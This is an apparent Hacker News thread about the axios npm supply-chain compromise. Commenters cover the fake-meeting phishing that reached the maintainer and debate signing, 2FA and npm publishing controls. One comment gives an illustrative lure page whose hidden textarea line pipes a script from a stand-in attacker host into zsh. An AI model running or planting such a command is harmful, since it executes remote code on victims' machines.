Post Mortem: axios NPM supply chain compromise

(github.com)

285 points | by JeanMeche 4 days ago

161 comments

  • Zopieux 3 days ago

    Not much we didn't know (you're basically SOL since an owner was compromised); however, we now have a small peek into the actual meat of the social engineering, which is the only interesting news imho: https://github.com/axios/axios/issues/10636#issuecomment-418...

    • hatmanstack 3 days ago

      jasonsaayman and voxpelli had useful write-ups from the "head on a swivel" perspective of what to watch out for. Jason mentioned "the meeting said something on my system was out of date"; they were using a Microsoft Teams meeting, and that's how the attackers got RCE. Would love more color on that.

      • NewEntryHN 2 days ago

        He says it mimics what is described here: https://cloud.google.com/blog/topics/threat-intelligence/unc...

        Which is basically phishing:

        > The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor's infrastructure, zoom[.]uswe05[.]us.

        > Once in the "meeting," the fake video call facilitated a ruse that gave the impression to the end user that they were experiencing audio issues.

        > The recovered web page provided two sets of commands to be run for "troubleshooting": one for macOS systems, and one for Windows systems. Embedded within the string of commands was a single command that initiated the infection chain.

      • pas 3 days ago

        they are cloning Zoom and MS Teams, and try to get people to either copy a script (which is in a textarea that's conveniently too small to show the whole script, scrollbars are hidden by CSS, and there's a copy button; when you paste it into the terminal you'll only see the last few lines, which also look innocent, but there's a curl | zsh or `mshta` somewhere in there), or download and run a binary/.dmg (which might even be signed by GoogIe LLC. - the name chosen to look good in the usual typeface used on macOS).

        ...

        it seems the correct muscle memory response to train into people is that "if some meeting link someone sent you doesn't work, then you should create one and send them the link"

        (and of course never download and execute anything, don't copy scripts into terminals, but it seems even veteran maintainers do this, etc...)

        see Infection Chain here https://cloud.google.com/blog/topics/threat-intelligence/unc...

        textarea at the bottom of this comment: https://github.com/axios/axios/issues/10636#issuecomment-418...
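        To make the trick concrete, here is a purely illustrative reconstruction (invented markup and URLs, not the actual attack page): the textarea is sized to show only the innocent-looking first lines, scrolling is suppressed, and the copy button grabs the full payload including the hidden tail.

```html
<!-- Hypothetical sketch of the hidden-payload textarea lure -->
<textarea id="fix" rows="2" style="overflow: hidden; resize: none" readonly>
echo "Checking audio drivers..."                   # visible, looks innocent
echo "Driver version 14.2 is outdated, patching"   # visible, looks innocent
curl -s https://attacker.example/update.sh | zsh   # below the fold, never seen
</textarea>
<button onclick="navigator.clipboard.writeText(document.getElementById('fix').value)">
  Copy fix
</button>
```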

        • ajross 3 days ago

          > it seems the correct muscle memory response [is something other than] never download and execute anything

          Arrgh. You're looking at the closest thing to a root cause and you're just waving over it. The culture of "just paste this script" is the problem here. People trained not to do this (or, like me, old enough to be horrified about it and refuse on principle) aren't vulnerable. But you just... give up on that and instead view this as a problem with "muscle memory" about chat etiquette?

          Good grief, folks. At best that's security theater.

          FWIW, there's also a root-er cause about where this culture came from. And that's 100% down to Apple Computer's congenital hatred of open source and refusal to provide or even bless a secure package management system for their OS. People do this because there's no feasible alternative on a mac, and people love macs more than they love security it seems.

          • nozzlegear 2 days ago

            > FWIW, there's also a root-er cause about where this culture came from. And that's 100% down to Apple Computer's congenital hatred of open source and refusal to provide or even bless a secure package management system for their OS. People do this because there's no feasible alternative on a mac, and people love macs more than they love security it seems.

            I don't understand. I used Linux for a long time before I switched to Mac, and the "copy this command and paste it in your terminal" trope was just as prevalent there.

            • darkwater 2 days ago

              Most of the copy-paste Linux commands used to be 'sudo aptitude install -y blahblah'. It is worth noting, though, that Ubuntu's PPAs became widespread enough at some point that pasting a new repo source was standard practice as well (which would open the way to this kind of attack for sure)

            • ajross 2 days ago

              It's really not, and to the extent it is it's an echo of the nonsense filtering from elsewhere. Linux distros went decades without this kind of thing by packaging the popular stuff securely. People who wanted the source knew how to get it. The "just copy this command" nonsense absolutely came from OS X first.

              • dj_mc_merlin 2 days ago

                Arch has pacman, and that worked so well that it had to have AUR, which is just glorified curl | bash. Linux distros managed it for decades when the vast majority of binaries you would run were made by nerds for nerds. If the original maintainer isn't willing to securely package it then you're often SOL.

                • ajross 2 days ago

                  AUR (also PPA which another comment cited) is emphatically not the same as "just run this script". If anything, and at worst, it's analogous to NPM: it's an unverified repository where the package is run at the whim of the author, and it leaves you subject to attacks against or by that author.

                  You still, however, know that the author is who they say they are, and that other people (the distro maintainers) believe that author to be the correct entity, and believe them to have been uncompromised. And any such compromise would, by definition, affect all users of the repo and presumably be detected by them and not by you in the overwhelmingly common case.

                  "Just run this script" short circuits all of that. YOU, PERSONALLY, ALONE have to do all the auditing and validation. Is the link legit? Did it come from the right place? Is it doing something weird? Was the sender compromised? There's no help. It's all on you. Godspeed.

                  • dj_mc_merlin 2 days ago

                    > You still, however, know that the author is who they say they are

                    This doesn't mean anything since "who they say they are" is an anonymous username with no real life correlation. Might as well be completely anonymous.

                    > that other people (the distro maintainers) believe that author to be the correct entity

                    No? Anyone can make an account and upload to AUR and it has exactly 0% to do with the distro maintainers. Packages can be removed if they're malicious, but websites can also be removed via browser-controlled blacklists (which I don't like btw but it's how it works nowadays).

                    > And any such compromise would, by definition, affect all users of the repo and presumably be detected by them and not by you in the overwhelmingly common case.

                    This is true of a popular website that advertises install instructions using curl | bash as well.

                    I've been using Linux for the past 2 decades and my general experience is that it is in no way more secure than Windows or Mac, just way less popular and with a more tech savvy userbase.

                    • ajross 2 days ago

                      > This doesn't mean anything since "who they say they are" is an anonymous username with no real life correlation.

                      No, that's affirmatively incorrect. AUR and PPA both require authenticated accounts. The "real life correlation" may be anonymous to you, but it is trackable in a practical sense. And more importantly, it's stable: if someone pushes an attack to AUR (or NPM, whatever) the system shuts it down quickly.

                      And the proof is THAT IS EXACTLY WHAT HAPPENED HERE. NPM noticed the Axios compromise before you did, right? QED. NPM (and AUR et al.) are providing herd protection that the script-paste hole does not.

                      Those scripts you insist on running simply don't provide that protection. The only reason you haven't been compromised is because you aren't important enough for anyone to care. The second you get maintainership over a valuable piece of software, you will be hacked. Because you've trained yourself to be vulnerable and (especially!) because you've demonstrated your softness to the internet by engaging in this silly argument.

                      • dj_mc_merlin 2 days ago

                        [flagged]

                        • ajross 2 days ago

                          ... you were the one who replied to me.

                          And, you were wrong, so I said so. Indeed this is a very frustrating site to post incorrect points. It's like ground zero for Cunningham's Law study cases.

                          • dj_mc_merlin 2 days ago

                            Are you happy? Ignoring everything else that's been said, I truly mean this: are you happy with the person you are?

                            • ajross 2 days ago

                              Again, I'm really not understanding your offense here. You came to me to disagree with something I posted. And as it happened you were wrong. I told you so, and you dug in twice with more incorrect takes. That's just... discussion. And frankly pretty polite discussion even by the standards of this site (which is pretty polite!).

                              There's no etiquette that demands I not tell you you're wrong.

      • Hamuko 2 days ago

        Makes me glad that I've only ever used my iPad whenever I've had to interview through Microsoft Teams.

        • rk06 2 days ago

          this is literally the lesson i take from this. always do meetings on tablets

      • denalii 3 days ago

        Another comment already said this, but it seems it was likely a clone of the web interface rather than the actual Teams client. You can see a lot more details in this comment on the GitHub thread (not by the axios maintainer, but it goes over the same threat group and campaign): https://github.com/axios/axios/issues/10636#issuecomment-418...

    • lrvick 3 days ago

      An owner being compromised is absolutely survivable on a responsibly run FOSS project with proper commit/review/push signing.

      This and every other recent supply chain attack was completely preventable.

      So much so I am very comfortable victim blaming at this point.

      This is absolutely on the Axios team.

      Go set up some smartcards for signing git pushes/commits and publish those keys widely, and mandate signed merge commits so nothing lands on main without two maintainer sigs and there are no more single points of failure.
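      The git side of that advice is only a few commands. A sketch (the key ID is a placeholder; enforcing two maintainer sigs additionally needs server-side branch protection):

```shell
# Sketch: turn on signing locally (placeholder key ID)
git config --global user.signingkey ABCD1234EF567890
git config --global commit.gpgsign true   # sign every commit
git config --global tag.gpgSign true      # sign every tag

# Spot-check signatures on history before trusting it
git log --show-signature -1
git verify-commit HEAD
```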

      • fortuitous-frog 3 days ago

        Did you investigate the maintainer compromise and publication path? The malicious version was never committed or pushed via git. The maintainer signs his commits, and v1 releases were using OIDC and provenance attestations. The malicious package versions were published locally using the npm cli after the maintainer's machine was compromised via a RAT; there's no way for package maintainers to disable/forbid local publication on npmjs.

        It seems the Axios team was largely practicing what you're preaching. To the extent they aren't: it still wouldn't have prevented this compromise.

        • lrvick 3 days ago

          I cannot find a single signed recent commit on the axios repo. It is totally yolo mode. Those "signed by github" signatures are meaningless. I stand by my comment in full.

          One must sign commits -universally- and -also- sign reviews/merges (multi-party) and then -also- do multi party signing on releases. Doing only one step of basic supply chain security unfortunately buys you about as much defense as locking only a single door.

          I do, however, certainly assign significant blame to the NPM team for repeatedly refusing optional package signing support, which would let packages with signing enabled be refused at the server and client if unsigned by a quorum of pinned keys. But even aside from that, if packages were signed manually then canary tools could have detected this immediately.

          • dns_snek 3 days ago

            What you sign or don't sign in your Git repo doesn't matter because NPM doesn't publish from a Git repo. Signing commits is still useful for your contributors and downstream forks but it won't have any effect on the users who use your package via NPM.

            I think NPM is fully to blame here. Packages that exceed a certain level of popularity should require signing/strong 2FA. They should implement more schemes that publishers can optionally enable, like requiring mandatory sign-off from more than 1 maintainer before the package is available to download.

            Then on the package page it should say: "[Warning] Weak publishing protection" or "[Checkmark] This package requires sign-off from accountA and accountB to publish".

            • pas 3 days ago

              2FA was mandated by npm

              they had 2FA, but likely software TOTP (so it was either autofilled via 1password (or similar), or they were able to steal the seed)

              at this point I think publishing an npm app and asking people to scan a QR with it is the easiest way (so people don't end up with 1 actual factor)

              • lrvick 3 days ago

                What they need to mandate is hardware anchored passkeys/fido2/webauthn for both auth and package signing, with the -option- to sign with PGP for those that have well trusted PGP keys.

                They won't do this, I have talked to them plenty of times about it. But, if they did, the supply chain attacks would almost entirely stop.

                • zarzavat 2 days ago

                  Don't need to require hardware 2FA tokens. Just a mobile app would be sufficient. Publish to a staging area, then require confirmation on mobile to make it go live. Maybe include a diff of changed files for good measure.

                  • patrakov a day ago

                    And even a mobile app (or, in fact, any single-person 2FA) would be unnecessary if we had a requirement for another live person to approve the release. As a bonus, a two-maintainers-required setup would also improve resilience against one of them going rogue or getting tortured.

              • 3 days ago
                [deleted]
              • HumanOstrich 3 days ago

                So you think the answer is replacing a requirement for a 6-digit 2FA code that can be typed into the npm publishing CLI with a requirement for a device that has a camera that can scan a QR code and then... what? What does the QR code do on the device? How does the npm CLI present the QR code?

                • lrvick 3 days ago

                  Simply supporting passkeys gives people domain-locked login via QR/phone, or any FIDO2 USB device. No more keyboard entry required for login other than the username, which means phishing is off the table. Standards are great if we can get anyone to use them.

            • lrvick 3 days ago

              Like I said. One must sign commits -universally- and -also- sign reviews/merges (multi-party) and then -also- do multi party signing on releases. The code in the release must match the code from git, or no publish.

              Until NPM can enforce those basic checks though, you have to roll your own CI to do it yourself, but large well funded widely used projects have an obligation to do the basics to protect their users, and their own reputations, from impersonation.

              • dns_snek 2 days ago

                I agree, I just think it's pointless to discuss Axios' commit-signing practices or lack thereof when NPM doesn't support any of it. It seems like axios was already using Trusted Publishing [1] and it still didn't get caught.

                You said that you "also" blame NPM, but they're the only party who should get any blame until they get their shit together.

                [1] https://github.com/axios/axios/issues/10636#issuecomment-418...

        • vaginaphobic 3 days ago

          [dead]

      • TheTaytay 3 days ago

        It wasn’t done through git. It was a direct npm publish from the compromised machine. If you read further down in the comments (https://github.com/axios/axios/issues/10636#issuecomment-418...), it seems difficult to pick the right npm settings to prevent this attack.

        If I understand it correctly, your suggestions wouldn’t have prevented it, which is evidence that this is not as trivially fixable as you believe it is.

        • lrvick 3 days ago

          To prevent supply chain attacks you need multi-party cryptographic attestation at every layer, which is pretty straightforward, but you are correct, NPM and GitHub controls absolutely will not save you. Microsoft insists their centralized approach can work, but we have plenty of evidence it does not.

          Operate under the assumption all accounts will be taken over because centralized corporate auth systems are fundamentally vulnerable.

          This is how you actually fix it:

          1. Every commit must be signed by a maintainer key listed in the MAINTAINERS file or similar

          2. Every review/merge must be signed by a -second- maintainer key

          3. Every artifact must be built deterministically and signed by multiple maintainers.

          4. Have only one online npm publish key maintained in a deterministic and remotely attestable enclave that validates multiple valid maintainer signatures

          5. Automatically sound the alarm if an NPM release is pushed any other way, and automatically revoke it.
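          Steps 1 and 2 can be enforced mechanically in CI. A sketch (assumes maintainer public keys are already imported into the keyring; the MAINTAINERS-file lookup is elided):

```shell
# Sketch: reject any commit whose signature is missing or not good.
# git's %G? format prints signature status: G = good; N/B/U/etc. = reject.
for c in $(git rev-list origin/main..HEAD); do
  status=$(git log -1 --format='%G?' "$c")
  if [ "$status" != "G" ]; then
    echo "commit $c is unsigned or has a bad signature" >&2
    exit 1
  fi
done
```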

          • charcircuit 3 days ago

            And for 5 there should be help on the NPM end to make it so that the alarms can fire before the new update is actually revealed to the public. There could be a short staging time where it could be revoked before any harm has been done. During this staging time NPM should also scan the package through a malware scanner before allowing it to go public.

            • lrvick 3 days ago

              I agree that would be nice, but NPM absolutely will not do any basic supply chain integrity work. They are actively opposed to it citing concerns that it might turn off lower skill developers that would be too annoyed by tapping a yubikey to sign releases or code. I have talked to them enough times over the years to have completely given up here.

              What's even more stupid is they actually started mandating 2FA for high risk packages, and FIDO2 supports being used to actually sign artifacts, but they instead simply use it for auth and let releases stay unsigned. Even for the developers they insisted hold cryptographic signing keys, they insist on throw-away signatures for auth only, not on using them for artifact signing to prevent impersonation. It is golf clap level stupid.

              Consider them a CDN that wants to analyze your code for AI training for their employer and nothing more. Any security controls that might restrict the flow of publishing even a little bit will be rejected.

              • 2 days ago
                [deleted]
      • patrakov a day ago

        The "nothing gets on main without two signatures" rule would not have prevented the xz story, where a comaintainer was able to smuggle malicious code past the review as "binary data for new tests" and, effectively, get it signed.

      • Zopieux 3 days ago

        This only works up to a point. Some human needs some way of changing the publication setup in case something goes wrong or changes. What you're asking is blowing a proverbial e-fuse once the setup is known to be working. This is software, shit will go wrong at some point and you need a way to make changes.

        • lrvick 3 days ago

          Of course, which is why all the (decent) tooling for this is provider agnostic, and provides documentation for multi-party-sharded backups so a quorum of maintainers can always re-assemble the key by hand for any reason if needed.

  • falkensmaize 2 days ago

    The fetch API has been widely available in browsers for a decade now, and in Node since 18. A competent developer could whip up a more axios-like library with fetch in a day easily. You can do all the cool things like interceptors with fetch too.

    Yet most developers I work with just use it reflexively. This seems like one of the biggest issues with the npm ecosystem - the complete lack of motivation to write even trivial things yourself.
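    As a sketch of that claim (all names here are invented for illustration): a tiny fetch wrapper supporting axios-style request/response interceptors. fetchImpl is injectable so the sketch can be exercised without a network.

```javascript
// Minimal axios-like client over native fetch (Node 18+ / browsers).
function createClient({ baseURL = "", fetchImpl = fetch } = {}) {
  const requestInterceptors = [];
  const responseInterceptors = [];
  return {
    interceptors: {
      request: { use: (fn) => requestInterceptors.push(fn) },
      response: { use: (fn) => responseInterceptors.push(fn) },
    },
    async request(path, options = {}) {
      // Run request interceptors (e.g. to attach auth headers).
      let config = { url: baseURL + path, options };
      for (const fn of requestInterceptors) config = fn(config);
      let res = await fetchImpl(config.url, config.options);
      // Run response interceptors (e.g. to throw on non-2xx).
      for (const fn of responseInterceptors) res = fn(res);
      return res;
    },
  };
}
```

    An auth header, retry policy, or JSON unwrapping then becomes a one-line interceptor registration.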

    • neya 2 days ago

      > A competent developer could whip up a more axios-like library with fetch in a day easily.

      Then you would have created just an axios clone. AKA re-inventing the wheel. The issue isn't the library itself, but rather the fact that it's popular and provided a large enough attack surface.

      You can actually just clone the axios package and use it as is from your private repo and you would not have been affected.

      • darepublic 2 days ago

        You would have created a smaller axios that only does what you needed it to. Even better

        • neya 5 hours ago

          Absolutely.

      • bensyverson 2 days ago

        I think we're entering an era where "re-inventing the wheel" is actually a completely valid defensive posture. The cost is so low relative to the reduction in risk.

      • littlestymaar 2 days ago

        > AKA re-inventing the wheel.

        The wheel is the native fetch API, nobody needs to reinvent it.

        All you'd do in that scenario is make your own hubcap to put on top.

    • kro 2 days ago

      I really don't get this either; I've always removed axios when it was preinstalled in a framework.

      I use "xhr" via fetch extensively; it has handled everything in day-to-day business for years with minimal boilerplate.

      (The only exception known to me being upload progress/status indication)

    • port11 2 days ago

      Axios really does a lot of other great things. I would argue that Fetch could’ve easily been Axios-lite. Axios handles errors better, has interceptors, parses JSON for you, etc.

      The multiple supply chain attacks against NPM packages would, of course, be solved if we simply stopped using third-party libraries.

      • falkensmaize a day ago

        I guess the point I’m making is that a lot of popular JavaScript libraries were created to address deficiencies in the core api that don’t exist anymore, but we keep using these libraries mostly because of entropy and familiarity.

      • schindlabua a day ago

        parse json?

        const x = await fetch(...); await x.json();

        "intercept" code that runs before every request?

        const withAuth = (res, options) => fetch(res, { ... do stuff here });

    • agumonkey 2 days ago

      Maybe people are too comfy with the axios base URL and interceptor API? Or maybe fetch handles that as well (through a shim)?

    • timcobb 2 days ago

      Fetch can't do a lot of table stakes stuff...

      • paustint 2 days ago

        Ok, well have AI write some table stakes for you in 10 minutes with 100% test coverage and only provide exactly what "table stakes" you are missing without any bells and whistles.

      • dkdbejwi383 2 days ago

        Such as?

  • robshippr 3 days ago

    The interesting detail from this thread is that every legitimate v1 release had OIDC provenance attestations and the malicious one didn't, but nobody checks. Even simpler, if you're diffing your lockfile between deploys, a brand new dependency appearing in a patch release is a pretty obvious red flag.
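    Both checks are available in stock tooling today; for example (assumes an npm 9+ project with a lockfile):

```shell
# Verify registry signatures and provenance attestations of installed packages
npm audit signatures

# Diff the lockfile against the previous deploy to spot surprise new deps
git diff HEAD~1 -- package-lock.json
```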

    • GCUMstlyHarmls 3 days ago

      To be honest, I would have assumed the tooling would do attestation verification for me. Diffing the lockfile would be on me, though.

    • clawfund 3 days ago

      npm could solve half of this by letting packages opt into OIDC-only publishing at the registry level. v1 already had provenance attestations but the registry happily accepted the malicious publish without them.

    • seanmarshall 2 days ago

      [flagged]

  • anematode 3 days ago

    Looks like a very sophisticated operation, and I feel for the maintainer who had his machine compromised.

    The next incarnation of this, I worry, is that the malware hibernates somehow (e.g., if (Date.now() < 1776188434046) { exit(); }) to maximize the damage.

    • ffsm8 3 days ago

      Isn't that already how it is?

      I mean the compromised machine registers itself on the command server and occasionally checks for workloads.

      The hacker then decides his next actions - depending on the machine they compromised, they'll either try to spread (like this time) and make a broad attack, or they may go more in-depth and try to exfiltrate data / spread internally if e.g. a build node has been compromised

  • fraywing 4 days ago

    Incredible uptick in supply chain attacks over the last few weeks.

    I feel like npm specifically needs to up their game on SA of malicious code embedded in public projects.

    • simulator5g 4 days ago

      That's the reality of modern war. Many countries are likely planting malware on a wide scale. You can't even really prove where an attack originated from, so uninvolved countries would also be smart to take advantage of the current conflict. Like if you primarily wrote in German, you would translate your malware to Chinese, Farsi, English, or Hebrew, and take other steps to make it appear to come from one of those warring countries. Any country making a long term plan involving malware would likely do it around this time.

      • altmanaltman 3 days ago

        You can write code in Chinese and Farsi?

        • simulator5g 2 days ago

          Yes, and there have been documented cases of translated malware. Sometimes it's done a little sloppily and there is other evidence that points to the origin being in another country that doesn't speak the language it's written in. But even then, you can't really prove they didn't just use a residential VPN or whatever.

        • axitanull 3 days ago

          You can deliberately put comments and descriptions in those languages.

    • dgellow 3 days ago

      npm's process to set up OIDC is way too frustrating. There is just so much friction. You need the package to first exist in the registry, meaning you have to first create an API token and push something. Only then can you enable OIDC for that specific package. After adding the repo + workflow names, you have to save. Then finally toggle the “only allow OIDC publishing”.

      Before each action you need to enter your 2FA code.

      I got so frustrated with npm end of last year that I wrote a whole guide covering that issue: https://npmdigest.com/guides/npm-trusted-publishing
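      Once that dance is done, the CI side is at least small. A sketch of a GitHub Actions release workflow using trusted publishing (assumes OIDC is already configured for the package on npmjs.com and a recent npm CLI):

```yaml
# Hypothetical release workflow using npm trusted publishing (OIDC)
name: publish
on:
  push:
    tags: ["v*"]
permissions:
  id-token: write   # lets the job request an OIDC token
  contents: read
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 22
          registry-url: https://registry.npmjs.org
      - run: npm ci
      - run: npm publish   # exchanges the OIDC token; no long-lived npm token
```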

    • ipnon 4 days ago

      NPM is designed to let you run untrusted code on your machine. It will never work. There is no game to step up. It's like asking an ostrich to start flying.

      • dcrazy 3 days ago

        It's far from a complete solution, but to mitigate this specific avenue of supply chain compromise, couldn't GitHub/npm issue single-purpose physical hardware tokens and allow (or even mandate, for the most popular projects) that maintainers use these hardware tokens as a form of 2FA?

        • yjftsjthsd-h 3 days ago

          What would a physical token give you that totp doesn't?

          Edit: wait, did the attacker intercept the totp code as it was entered? Trying to make sense of the thread

          • dcrazy 3 days ago

            The attacker installed a RAT on the contributor’s machine, so if they had configured TOTP or saved the recovery codes anywhere on that machine, the attacker could defeat 2FA.

            • yjftsjthsd-h 3 days ago

              Oh, yes, I missed that the TOTP machine was compromised :\ Would that then imply that it would have been okay if codes came from a separate device, e.g. a TOTP app on a Palm OS device with zero network connectivity? (Or maybe these days the easiest airgapped option is an old Android phone that stays in airplane mode...)

              • dcrazy 3 days ago

                The easiest approach is a provider-issued hardware dongle like a SecurID or Yubikey. Lack of end-user programmability is a feature, not a bug.

                • yjftsjthsd-h 3 days ago

                  > Lack of end-user programmability is a feature, not a bug.

                  I would argue that the problem is network accessibility, not programmability.

                  • dcrazy 3 days ago

                    When designing a system for secure attestation, end-user programmability is not a feature.

                    It would not be an advantage for your front door lock to be infinitely reprogrammable. It’s just a liability.

                    • yjftsjthsd-h 3 days ago

                      I mean, I guess attestation might have some value, but it feels like moving the goalposts. Under the threat model of a remote attacker who can compromise a normal networked computer, I can't think of an attack that would succeed with a programmable TOTP code generator that would fail if that code generator was not reprogrammable. Can you?

                      > It would not be an advantage for your front door lock to be infinitely reprogrammable. It’s just a liability.

                      Er, most door locks are infinitely reprogrammable, because being able to rekey them without having to replace the whole unit is a huge advantage and the liability/disadvantage is minimal (falling under "It rather involved being on the other side of this airtight hatchway" in an unusually almost-literal sense where you have to be inside the house in order to rekey the lock, at which point you could also do anything else).

                      • dcrazy 3 days ago

                        Sorry, attestation is the goalpost. The community wants certainty that the package was published by a human with authority, and not just by someone who had access to an authority’s private keys. That is what distinguishes attestation from authentication or authorization.

              • nurettin 3 days ago

                Yes, unfortunately authenticator apps just generate TOTP codes based on a binary key sitting in plain sight without any encryption. Not that it would help if the encrypting/decrypting machine is pwned.

      • lrvick 3 days ago

        All maintainers need to do is code signing. This is a solved problem, but the NPM team has been actively rejecting optional signing support for over a decade now. Even so, maintainers could sign their commits anyway, but most are too lazy to spend a few minutes to prevent themselves from being impersonated.

        • yawaramin 3 days ago

          If the solution is 'maintainers just need to do xyz', then it's not a solution, sorry. It's not scalable and which projects become 'successful' and which maintainers accidentally become critical parts of worldwide codebases, is almost pure chance. You will never be able to get all the maintainers you need to 'just' do xyz. Just like you will never be able to get humans to 'just' stop making mistakes. So you had better start looking for a solution that doesn't rely on humans not making mistakes.

          • jiggawatts 3 days ago

            "Discipline doesn't scale" has become one of my favourite quotes for a reason.

          • lrvick 3 days ago ago

            It scales just fine for thousands of maintainers of thousands of packages for every major linux distribution that powers the internet. You just have to automate enforcement so people do not have a choice.

            Are you really saying there is just something fundamental about javascript developers that makes them unable to run the same basic shell commands as Linux distribution maintainers?

            • yawaramin 2 days ago ago

              No, it really doesn't scale that well. 'Thousands' of packages is laughable compared to the scale of npm. And even at the 'thousands' scale distros are often laughably out of date because they're so slow to update their packages.

              You are of course right that a signed package ecosystem would be great, it's just that you're asking people to do this labour for you for free. If you pay some third party to verify and sign packages for you? That's totally fine. Asking maintainers already under tremendous pressure to do yet another labour-intensive security task so you can benefit for free? That's out of balance.

              Are they incapable of doing it? Probably not. Does it take real labour and effort to do it? Absolutely.

              • lrvick 2 days ago ago

                My 7 teammates and I on stagex actually maintain all this zero-trust signing and release process I am suggesting for several hundred packages and counting. Not asking anyone to do hundreds like my team and I are, but if authors could just at least do the bare minimum for the code they directly author that would eliminate the last gaping hole in the supply chain.

        • woodruffw 2 days ago ago

          With what keys, and how do you propose establishing trust in those keys?

          (As we’ve seen from every GPG topology outside of the kinds of small trusted rings used by Linux distros and similar, there’s no obvious, trustworthy, scalable way to do decentralized key distribution.)

          • lrvick 2 days ago ago

            If the keys that signed the early commits of a trusted FOSS project suddenly change without being signed by the previous keys, that should merit a higher level of consensus at release time, or waiting periods, etc.

            Identity continuity at a minimum, is of immense defensive value even though we will not know if the author is human or trusted by any humans.

            That said any keys that become attached to projects that are highly depended on would earn a lot of trust that they are human by getting a couple of the 5k+ of people worldwide with active well trusted PGP keys to sign theirs via conferences or otherwise, as it has always been.
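            The continuity policy being described fits in a few lines. This is a hypothetical sketch, not any real tool's API; all names and data structures are illustrative:

```python
def release_needs_extra_scrutiny(signing_key: str,
                                 prior_keys: set[str],
                                 endorsements: dict[str, set[str]]) -> bool:
    """Flag a release whose signing key is new to the project AND was not
    cross-signed by any previously seen project key. Such releases would get
    the higher-consensus / waiting-period treatment described above."""
    if signing_key in prior_keys:
        return False  # same identity as earlier releases
    endorsed_by = endorsements.get(signing_key, set())
    # A new key is acceptable only if an old, trusted key vouched for it.
    return not (endorsed_by & prior_keys)
```

            For example, a release signed by a brand-new key with no endorsement would be flagged, while one signed by a new key that an old key had cross-signed would pass.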

            • woodruffw 2 days ago ago

              > If the keys that signed the early commits of a trusted FOSS project suddenly change without being signed by the previous keys, that should merit a higher level of consensus at release time, or waiting periods, etc.

              Two immediate problems: (1) package distribution has nothing to do with git (you don’t need to use any source control to publish a package on most indices, and that probably isn’t going to change), and (2) this doesn’t easily account for expiry, revocation, or the more basal reality that most people just aren’t good at key management. I think a workable design can’t make these assumptions.

              > That said any keys that become attached to projects that are highly depended on would earn a lot of trust that they are human by getting a couple of the 5k+ of people worldwide with active well trusted PGP keys to sign theirs via conferences or otherwise, as it has always been.

              This doesn’t scale to graphs of hundreds of thousands of maintainers, like PyPI has. I’m also not convinced it’s ever really worked on smaller scales either, except it in the less useful “nerd cred” sense.

              • lrvick 8 hours ago ago

                > (1) package distribution has nothing to do with git

                It does in stagex, and could in any project. The same maintainer keys that sign commits and reviews are the same keys that must sign releases.

                > (2) this doesn’t easily account for expiry, revocation, or the more basal reality that most people just aren’t good at key management. I think a workable design can’t make these assumptions.

                I do not accept this excuse. People keep up with passports and birth certificates, and you are generally not allowed to have backups of those. I for one am not going to assume that most programmers are incapable of writing down 24 English words on paper, making as many backups as they need, and recovering at least one of those in the future if they need to restore a key.

                If a developer really cannot keep track of something so trivial, I absolutely do not trust them not to get their identity stolen by someone seeking to push a supply chain attack.

                > This doesn’t scale to graphs of hundreds of thousands of maintainers, like PyPI has. I’m also not convinced it’s ever really worked on smaller scales either, except it in the less useful “nerd cred” sense.

                Say that to the 5444 PGP keys in the current web of trust that signs and maintains most packages for every major linux distribution running the bulk of the services on the internet. It works just fine.

                Simply make it a hard requirement for popular dependencies. Developers that cannot figure out how to type 2 commands to generate a key, put it on a smartcard, and write down a 24-word backup should not be maintainers.

                That may sound harsh, but being a maintainer of popular FOSS means an obligation to do the bare minimum to not get your identity stolen, like signing code and releases.

                Last century doctors all balked at the idea of washing hands or tools between patients even though it provably resulted in better health outcomes on average.

                "But look, everyone is negligent, and they are not likely to change" is not an excuse to not adopt obvious massive harm reduction with little effort.

                My team and I practice everything I am preaching here and any responsible project can do the same to protect their projects even if the majority ignorantly do not.

      • pas 3 days ago ago

        code becomes trusted by review, but these crowd sourcing efforts to do so fizzled out, so in practice we have weak proxies like number of downloads

        the implicit trust we have in maintainers is easily faked as we see

  • Xentyon 2 days ago ago

    This is why I've moved to native fetch for most projects. The fewer dependencies in the chain, the smaller the attack surface. For API clients especially, fetch + a thin wrapper is usually enough.

  • akersten 3 days ago ago

    Any good payload analysis been published yet? Really curious if this was just a one and done info stealer or if it potentially could have clawed its way deeper into affected systems.

  • uticus 4 days ago ago

    > March 31, around 01:00 UTC: community members file issues reporting the compromise. The attacker deletes them using the compromised account.

    Interesting it got caught when it did.

  • eviks 3 days ago ago

    > something on my system was out of date. i installed the missing item

    Given the "extreme vigilance" of the primitive "don't install unknown something on your machine" level is unattainable, can there really be an effective project-level solutions?

    Mandatory involvement of more people, in the hope that not everyone installs random stuff, or at least not at the same time? (though you might not even have more people...)

  • pianopatrick 3 days ago ago

    Seems to me the root of the problem was that the guy was using the same device for all sorts of stuff.

    Seems to me that one drastic tactic NPM could employ to prevent attacks like this is to use hardware security. NPM could procure and configure laptops with identity rooted in the laptop TPM instead of 2FA. Configure the NPM servers so that for certain repos only updates signed with the private key in the laptop TPM can be pushed to NPM. Each high profile repo would have certain laptops that can upload for that repo. Set up the laptop with a minimal version of Linux with just the command line tools to upload to NPM, not even a browser or desktop environment. Give those laptops to maintainers of high profile repos for free to use for updates.

    Then at update time, the maintainer just transfers the code from their dev machine to the secure laptop via USB drive or CD and pushes to NPM from the special laptop.

    • pas 3 days ago ago

      they can simply make an app that requires tapping a button, so people don't end up with TOTP seeds stored in their password manager on the same notebook where they run 'publish' from

  • Chyzwar 2 days ago ago

    NPM should fix this mess.

    Adding postinstall should require approval from NPM. NPM clients should not install freshly published packages. NPM packages should be scanned after publishing. High profile packages should verify upstream git hash signature. NPM install should run in sandbox and detect any attempt to install outside project directory.
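    One of these mitigations is already available client-side today, though opt-in rather than the default: lifecycle scripts (including postinstall) can be disabled per project in .npmrc:

```
# .npmrc -- refuse to run lifecycle scripts (preinstall/install/postinstall)
# for every package this project installs
ignore-scripts=true
```

    The tradeoff is that dependencies which legitimately need install scripts (e.g. native builds) must then be built or allow-listed explicitly.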

    But npm, being part of a multi-trillion-dollar company, cannot be bothered to fix any of these. Instead they push for tighter integration with GitHub, with UX that sucks.

    • cromka 2 days ago ago

      > NPM clients should not install freshly published packages.

      That would be a beautiful example of the Cobra effect: what about updates that fix vulnerabilities? You're gonna force users to wait a couple of days or a week before they can get malware removed?

      • mcintyre1994 2 days ago ago

        In cases like this that isn’t an issue, NPM takes the malicious package down and you roll back to the previous version.

